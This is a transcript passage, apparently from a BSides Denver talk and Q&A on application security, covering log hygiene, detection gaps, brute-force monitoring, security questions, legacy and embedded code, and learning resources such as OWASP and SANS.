programmers' fault is: how would you react if you got a message saying, okay, the light went out on your refrigerator, so we've turned your refrigerator off until the manufacturer ships us a replacement part, should come in the next couple of weeks, or maybe you might have to buy another refrigerator? Yeah, that's pretty much the same thing as going to a company and saying, you have this code that needs to be updated, so you should stop everything you're doing and update it. It just doesn't work in the real world. Is this a problem? Yes. Is it something that needs to be addressed? Yes. Is it something I have a solution for and I'm going to tell you about

right now? No, because unfortunately it's a common issue. But the key thing here, that I'm trying in my poor way to point out, is this isn't a blame game. Because you found a problem in a program doesn't mean the program's bad, it doesn't mean that the development group is lazy. What it means is that this sort of stuff needs to be given to the developers and the architects so that they can come up with a good way, or a clean way, of updating and fixing their program. So with that public service message we'll continue on. This is probably my all-time favorite picture. I don't know how well it's going to come

across on the Twitch screen, since I don't have Twitch up and running at this point, but if you look down at the very bottom of this picture you'll see that there's a pair of shoes here, and if you look real carefully you'll see somebody is wearing some sort of clothes, or a cloak, that lets them almost perfectly blend in with the background. This is what you as an application hacker really want to do as well: you want to blend into the program, you want to blend into the system. And this is an area that developers tend to overlook. They'll write logs, they'll write monitoring stuff, but they won't necessarily make them or protect them, so you can get in and

you can delete the fact that you got into the system. You can find some interesting information. I've seen logs where passwords were put in just as part of the normal development process, because the developer wanted to be able to reproduce an error if it happened. You can see session IDs; a lot of times a developer will simply dump the contents of an HTTP request, which will include session IDs, and as you saw earlier with WebGoat, it might even have unencrypted passwords and stuff like that. Okay, I'm doing this for a good purpose, why would I want to disguise myself? Well, part of the reason that you're

disguising yourself is to make sure that the monitoring software can catch you. They say that the typical time to detect a breach is 200 days. That's scary, to say the least. So when you're helping out a team, when you're doing your penetration testing, when you're doing your red team engagement, when you as a developer are poking around testing out your program, or if you're the security guy helping out the development team, you want to try to get that monitoring, that detection, down as quick as possible. Just imagine what a professional malware hacker can do in 200 days. So that's sort of the interesting

thing with that one, and that's where logs can be very important, because these logs are absorbed and read in by security operations centers, by monitoring programs, they're evaluated by machine learning and all this sort of stuff, and they're supposed to catch this sort of stuff. I can't even begin to tell you how many programs I've done pseudo-penetration tests on, even just the brute force stuff, like that example I had earlier in the presentation where I was doing brute force attacks. I was literally sending thousands and thousands of password requests a minute, or a second, and no alarms were going off. That's an indication that, I'm sorry, something's wrong with the setup in your system.

Those sorts of quite obvious red team efforts should be caught immediately, but frequently they aren't. So at any rate, that is pretty much my time. I'm actually on time, which is very unusual for me, so this is time for questions and answers if you've got any. Here's some information if you want to reach out to me. Like I said, I'm happy to send the slide deck, which has got a lot more information in it. If you want to reach out and ask me questions, that's fine too, and with that I will turn it over to the moderator.

Okay, thank you very much, Greg. So as you said, if you have any questions you can jump in the Discord; check the BSides Denver Twitter for all the links. Throughout the day we're using different Discords for different speakers, just for isolation, keep one of these hooligans away from the other, that kind of thing. We've got about 15 minutes, it's quite a bit of time, plenty for questions. They don't have to be about the talk, you can also ask them other inappropriate questions, or you can ask telecon, you know, tales from back in the day, which goes back quite a ways.

I mean, really? Yeah, respond to a couple of these things

here. And no, it's not ask for forgiveness instead of permission. Let's see here now. Somebody else, when we were talking about security questions, made a very good comment here about how you don't actually have to answer the security questions correctly. The company isn't going to go out and make sure that you use the correct mother's maiden name, so a lot of people will just stick in random information there. That's certainly one way of handling those security questions. If you type in 45 characters of random garbage, chances are I'm not going to figure that out very well. I have, however, seen situations where

they will actually do basically brute force guessing on some of this stuff. I wouldn't be surprised if at some point they're going to start just doing random characters, sort of like password spraying, if you will. I suspect that most of those security questions aren't well monitored, so it would not surprise me if people start doing that sort of stuff, because like I said, I doubt they're monitored, I doubt there are any thresholds associated with them. But that's actually a very good way to handle the security questions: don't put in the real answers. Let's see here, looking through... yeah, a lot of hassling on this. Okay,

I think those were all the... ah, there's a question at the end there for you. If I had everything to do over again, what would I do differently from a programming standpoint? That's actually a very good question.

It's hard to say. One of the examples I've used is, decades ago when I wrote programs, I wrote programs that had SQL injection attacks in them, and as a matter of fact some of the code that I showed on that slide there looked exactly like code I wrote 20-some years ago. That's part of the problem with the whole development cycle, and it's even worse for things like the shuttle, code that runs on the shuttle, or code that's in an embedded system, because you write these sorts of things and you may write it

as secure and as tightly as is possible for the time, but you put it into your chip, you take your chip, you stick it into a car, you embed it in your microwave, and two days later somebody figures out a way around it. They figure out that 1=1 can be stuck in there, so now all of a sudden your code is vulnerable. Well, what do you do? I mean, you can't wander around to everybody's microwave and replace their chip. If it's an embedded device you usually can't update it. So what do you do? This is a common

problem in the development arena, and there's no good answer for it. You hear some people talking about how 5G will solve those, because your microwave can now be connected to the internet. Ignoring all the conspiracy theories with 5G at this point, well, if you connect it to the internet you have all sorts of other issues. In one of the Chris's talks later today you can always ask about the dancing Roombas, which is one of my favorite stories, because if you connect something to the internet that wasn't originally connected to the internet, I can almost guarantee you it wasn't written securely. So yeah, you can connect all the stuff to the internet, and now all of a sudden you

have trillions of programs that are all vulnerable, so that's not a good solution either. Let's see here. Actually, I don't actually know of any good books or online... actually, no, I take that back. I can't think of any books off the top of my head, but the best online reference would be owasp.org. They probably even have books there. It is a great place to learn everything there is to know about application security, whether hacking it or defending it. Really, that's the place I would start. Once you do that, then it's just a matter of learning various things involving programs. HTML and JavaScript

are great places to start to learn things about how your web systems work, how your application programs work. Oodles of online examples; I've got some of them in the slide deck as well. W3Schools is a great place to learn. There's hundreds of YouTube videos out there that basically go into that, you know, they step through WebGoat, for example: here's how you break into the WebGoat stuff. There's app things out there that'll teach you all sorts of programming code. I mean, at this point you probably don't even need books anymore, you can probably just do it all online. Let's see, next question. That's actually a very good one, which is

which is more rewarding, attacking software or protecting software? I'd say it's a faster thrill to attack software, but it's probably a more satisfying thrill to keep them out. But that's me personally; some people prefer the hacking to the protecting, some prefer the protecting to the hacking. I like to do both. Oh, let's see here. Yep, good point there, Doug. SANS has some great resources as well. But yeah, like I said, SANS, OWASP, those are probably your top things to learn about all things application. And like I said, you just go into YouTube, search for application hacking, web attacks, stuff like that, and there are people there who are literally

typing it in and you can watch them do it. Great place to learn all that sort of stuff. Like I said, at best this was just sort of designed to pique your interest, but there are plenty of resources out there. Let's see here. Yeah, well, for those who are thinking... I will say that I started my career, my official career, as a coder. I have done programming and coding for an extremely long time and I sort of learned security by accident. It was one of those sorts of things where it's like, well, what if somebody does this, or why isn't there a username and

password around this, or why are you sending it in plain text? And that just sort of naturally led into the whole security arena. Now if you go far enough back, I actually technically started my career hacking. I'll give you an idea of my age: hacking floppy disks on an Apple II. So that kind of gives you an idea just how old I am here.

That sounds familiar, by the way. Greg, five-minute warning.

Ah, five-minute warning, okey-dokey. So, frankly, a diverse background helps a lot when it comes to hacking. If all you do is think like a programmer, you'll fall into the same mindset that programmers do.

So yeah, if you come from a religious background, you come from an embedded background, you come from networking, I mean, heck, you come in as a teacher, you will see things in a different light than the developer did, and frankly that's great, because you will see things that the developers will miss. So with that... yep, the Humble Bundle books are a great place to get that sort of stuff as well. And with that, I think I've hit all the questions that are coming in at this point. We'll be monitoring the Discord channel, so if you want to type in something afterwards that's fine too. And with that, I be fini.